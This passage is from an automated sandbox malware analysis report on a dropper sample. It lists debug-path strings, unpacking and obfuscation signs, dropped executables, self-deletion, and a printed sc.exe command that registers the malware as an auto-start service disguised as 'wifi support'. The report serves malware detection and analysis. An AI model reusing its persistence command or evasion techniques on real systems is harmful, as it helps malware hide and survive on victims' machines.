                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdb source: CCB2.exe, 0000000F.00000000.768135951.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: BB8A.exe, 0000000C.00000000.759454697.0000000000413000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.765793505.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000010.00000002.807243826.0000000004DE0000.00000002.00020000.sdmp
                      Source: Binary string: C:\bajudag\zexi\yedu49\hecicu\2-tiwi\cabilok\fes.pdb source: D936.exe, 00000011.00000000.776580962.0000000000401000.00000020.00020000.sdmp, krmdinzg.exe, 00000020.00000000.795753078.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\nobaniz_sakalacato34.pdb source: ECD2MpEBSf.exe, ECD2MpEBSf.exe, 00000000.00000002.667356464.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000000.00000000.661810290.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000001.00000000.664620927.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000000.751866281.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000002.758107473.0000000000401000.00000020.00020000.sdmp, jgdhbua, 0000000B.00000000.755033215.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000010.00000003.778942214.0000000000B3E000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777377914.0000000000B3E000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeUnpacked PE file: 15.2.CCB2.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeUnpacked PE file: 17.2.D936.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeUnpacked PE file: 32.2.krmdinzg.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeUnpacked PE file: 15.2.CCB2.exe.400000.0.unpack .text:ER;.data:W;.zic:W;.wuvuhus:W;.jufot:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeUnpacked PE file: 17.2.D936.exe.400000.0.unpack .text:ER;.data:W;.lih:W;.cazelob:W;.pox:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeUnpacked PE file: 32.2.krmdinzg.exe.400000.0.unpack .text:ER;.data:W;.lih:W;.cazelob:W;.pox:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      .NET source code contains potential unpackerShow sources
                      Source: A4DE.exe.5.dr, Univesity_Grade_Calculator/Form1.cs.Net Code: Form1_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: D502.exe.5.dr, CoreApi.cs.Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: 3D34.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.0.3D34.exe.ec0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.0.3D34.exe.ec0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.2.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 18.0.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 37.0.3D34.exe.150000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 37.2.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 37.0.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 37.0.3D34.exe.150000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00573634 push es; iretd
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 9_2_006F3634 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_00412CA4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0069127E push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0069123C push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0069735E push esp; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_006953C8 pushfd ; retf
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0041A63D push eax; retf 007Fh
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0041A6C4 push E0007FC6h; retf 007Fh
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0041A310 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0041A7DC pushad ; iretd
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_004139B0 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00693C00 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_0043DA48 push es; retf 0041h
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_00EC8508 push 00000028h; retf 0000h
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_00EC764A push esp; ret
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_017B4003 push esi; retf
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_0581C502 push E80B905Eh; ret
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_0581D4EB push esp; iretd
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_0581CF38 pushad ; retf
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_0581CF78 pushfd ; retf
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_0043DA48 push es; retf 0041h
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_0042D770 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: 6C37.exe.5.drStatic PE information: 0xAB35ADD6 [Sat Jan 8 14:57:26 2061 UTC]
                      Source: ECD2MpEBSf.exeStatic PE information: section name: .kipex
                      Source: ECD2MpEBSf.exeStatic PE information: section name: .him
                      Source: ECD2MpEBSf.exeStatic PE information: section name: .hakir
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: E3A9.exe.5.drStatic PE information: section name:
                      Source: E3A9.exe.5.drStatic PE information: section name: .28gybOo
                      Source: E3A9.exe.5.drStatic PE information: section name: .adata
                      Source: CCB2.exe.5.drStatic PE information: section name: .zic
                      Source: CCB2.exe.5.drStatic PE information: section name: .wuvuhus
                      Source: CCB2.exe.5.drStatic PE information: section name: .jufot
                      Source: 6C37.exe.5.drStatic PE information: section name: .didata
                      Source: 888A.exe.5.drStatic PE information: section name: _RDATA
                      Source: D936.exe.5.drStatic PE information: section name: .lih
                      Source: D936.exe.5.drStatic PE information: section name: .cazelob
                      Source: D936.exe.5.drStatic PE information: section name: .pox
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name:
                      Source: 9889.exe.5.drStatic PE information: section name: .kujN2o2
                      Source: 9889.exe.5.drStatic PE information: section name: .adata
                      Source: CADF.exe.5.drStatic PE information: section name: _RDATA
                      Source: jgdhbua.5.drStatic PE information: section name: .kipex
                      Source: jgdhbua.5.drStatic PE information: section name: .him
                      Source: jgdhbua.5.drStatic PE information: section name: .hakir
                      Source: krmdinzg.exe.17.drStatic PE information: section name: .lih
                      Source: krmdinzg.exe.17.drStatic PE information: section name: .cazelob
                      Source: krmdinzg.exe.17.drStatic PE information: section name: .pox
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                      Source: E3A9.exe.5.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                      Source: 9889.exe.5.drStatic PE information: real checksum: 0x373823 should be: 0x3738f9
                      Source: D502.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x1298c
                      Source: 3D34.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96486152385
                      Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                      Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                      Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                      Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                      Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.98113997622
                      Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.95944979331
                      Source: initial sampleStatic PE information: section name: entropy: 7.99715248044
                      Source: initial sampleStatic PE information: section name: entropy: 7.90789134233
                      Source: initial sampleStatic PE information: section name: entropy: 7.99431797903
                      Source: initial sampleStatic PE information: section name: entropy: 7.81839424264
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22755578232
                      Source: initial sampleStatic PE information: section name: .kujN2o2 entropy: 7.91856580958
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96486152385
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.95944979331
                      Source: 3D34.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 3D34.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 18.0.3D34.exe.ec0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.0.3D34.exe.ec0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 18.0.3D34.exe.ec0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.0.3D34.exe.ec0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 18.2.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.2.3D34.exe.ec0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 18.0.3D34.exe.ec0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 18.0.3D34.exe.ec0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.0.3D34.exe.ec0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 18.0.3D34.exe.ec0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 37.0.3D34.exe.150000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 37.0.3D34.exe.150000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 37.2.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 37.2.3D34.exe.150000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 37.0.3D34.exe.150000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 37.0.3D34.exe.150000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 37.0.3D34.exe.150000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 37.0.3D34.exe.150000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                      Persistence and Installation Behavior:

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jgdhbuaJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\888A.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D936.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3D34.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9889.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D502.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BB8A.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FB58.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jgdhbuaJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CADF.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A4DE.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeFile created: C:\Users\user\AppData\Local\Temp\krmdinzg.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6C37.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E3A9.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A332.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CCB2.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe (copy)Jump to dropped file
                      Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\qeprvgom
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Deletes itself after installationShow sources
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\ecd2mpebsf.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jgdhbua:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess information set: NOGPFAULTERRORBOX
